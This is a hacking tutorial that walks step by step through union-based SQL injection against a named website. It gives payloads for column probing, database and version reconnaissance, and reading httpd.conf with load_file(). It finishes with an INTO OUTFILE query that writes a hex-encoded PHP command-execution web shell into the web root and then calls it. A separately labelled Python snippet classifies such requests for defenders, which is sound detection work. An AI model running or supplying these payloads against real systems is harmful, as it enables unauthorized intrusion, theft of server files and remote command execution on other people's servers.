I decided to write a complete tutorial on pwning a machine using SQL injection, even without executing system commands.
Here is the complete video; you can watch it before reading for a better understanding.
First, we start by recognizing the injection point.
So here we go.
http://turfrecon.com/select.php
POST Union Based SQL injection
Let's try entering 1' and see what happens.
So now we can start the injection:
1' order by 1#
No Error
1' order by 2#
Error, so the query returns a single column.
Getting the required information from the server
1' union all select group_concat(database(),0x3D,user(),0x3D,version(),0x3D,@@datadir)#
With this query we got:
Database : sqlol
username : root@
version : 5.5.24-log
datadir : c:\wamp\bin\mysql\mysql5.5.24\data\
Now let's find out the Apache version.
There are many ways to do that, but I'm going to use the Firefox Tamper Data add-on to check the request header.
So it's Apache 2.2.22.
Now we can guess the Apache config file path, so let's view the file using a SQL query:
1' union all select load_file('c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf')#
Now search for the website name and get the document root:
DocumentRoot "c:/wamp/www/turf/"
1' union all select 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e INTO OUTFILE 'c:/wamp/www/turf/gothacked.php'#
Now check http://turfrecon.com/gothacked.php?c=echo "You Got pwn3d"
Now you can upload any file to the server using the wget command.
NOTE: I WENT THROUGH THE FILES AS PER THE SCENARIO, WHICH MAY BE DIFFERENT IN DIFFERENT CASES, SO
YOU JUST NEED TO FIND THE DEFAULT FILE PATHS AS PER YOUR SCENARIO; THE REST OF THE COMMANDS WILL
BE THE SAME.
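For defenders, each stage of this walkthrough (column probing, UNION SELECT, load_file() and INTO OUTFILE with a hex-encoded PHP payload) leaves a recognizable pattern in the POST body. The following is an added example, not part of the original tutorial, that classifies request bodies by stage; the field name id, the file paths and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Signatures for the stages of the walkthrough, most severe first.
STAGES = [
    ("file_write", re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
    ("recon", re.compile(r"@@datadir|\b(?:database|user|version)\s*\(")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("column_probe", re.compile(r"\border\s+by\s+\d+")),
]
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})\b")


def normalize(value):
    """Lowercase, replace /* */ comments with a space, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)


def decoded_hex(text):
    """Decode 0x... literals so hex-encoded file content becomes readable."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(text)]


def classify(body):
    """Return (field, stages, writes_php) for each suspicious POST field."""
    findings = []
    for field, raw in parse_qsl(body, keep_blank_values=True):
        text = normalize(raw)
        stages = [name for name, rx in STAGES if rx.search(text)]
        php = any("<?" in d for d in decoded_hex(text))
        if stages:
            findings.append((field, stages, php and "file_write" in stages))
    return findings


# Constructed sample bodies; the field name "id" and the paths are assumptions.
SAMPLES = [
    "id=42",
    "id=1%27+order+by+2%23",
    "id=1%27+union+all+select+load_file(%27c:/x/httpd.conf%27)%23",
    "id=1%27+union+all+select+0x3c3f706870203f3e"
    "+INTO+OUTFILE+%27c:/x/t.php%27%23",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:40], "->", classify(sample))
```

A body flagged with file_write and writes_php set means a PHP file was being written through the database, which is the point at which the web root should be checked for unexpected files.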
Have Fun Thanxz for Reading
3nj0y H4ck!nG